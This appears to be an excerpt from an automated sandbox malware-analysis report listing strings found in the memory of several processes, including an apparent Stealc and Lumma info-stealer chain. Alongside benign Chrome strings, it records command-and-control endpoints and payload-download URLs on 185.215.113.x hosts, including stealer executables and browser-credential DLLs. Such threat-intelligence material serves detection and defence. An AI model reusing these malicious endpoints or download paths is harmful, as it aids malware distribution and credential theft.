Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.c equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: captcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002B.00000003.2369946167.00002B3C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2369741225.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2370978019.00002B3C00748000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000002B.00000003.2369946167.00002B3C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2369741225.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2370978019.00002B3C00748000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002B.00000002.2759328311.00002B3C002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)

Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://.css
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://.jpg
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/216e50adc2dd0a1bfe522b3effbbd4e64e3aa636b77#
Source: axplong.exe, 0000000D.00000002.3755340826.000000000132E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php0ds
Source: axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php472001
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php5
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php6
Source: axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php;
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpKw
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpKwK
Source: axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpUsers
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_
Source: axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedCd
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedZd
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpgf
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded9d
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedqd4
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpoft
Source: axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=tq
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/random.exe
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/random.exe9
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/splwow64.exe
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/splwow64.exe#
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/f49fa1f45a5fea9f5c7cf18216e50adc2dd0a1bfe522b3effbbd4e64e3aa636b77#1
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ferences.SourceAumid001
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/GOLD1234.exe
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/RDX123456.exe
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/new_v8.exe
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001314000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exeE
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001314000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exej
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/l
Source: axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe2q
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/lumma/random.exe
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/lumma/random.exeJc
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2784699735.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2784699735.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2779671424.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ows
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe5I
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/t
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.17
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmp, stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php)
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php5
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php?
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpEdge
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpY
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpdll
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpge
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpoft
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpro
Source: stealc_default2.exe, 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll;fx#
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllwa
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dll
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dllc
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll-f
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll1a
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dlliaN
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll#a
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dllPH
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/h
Source: stealc_default2.exe, 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.172fb6c2cc8dce150a.phption:
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Offnewhere.exe
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
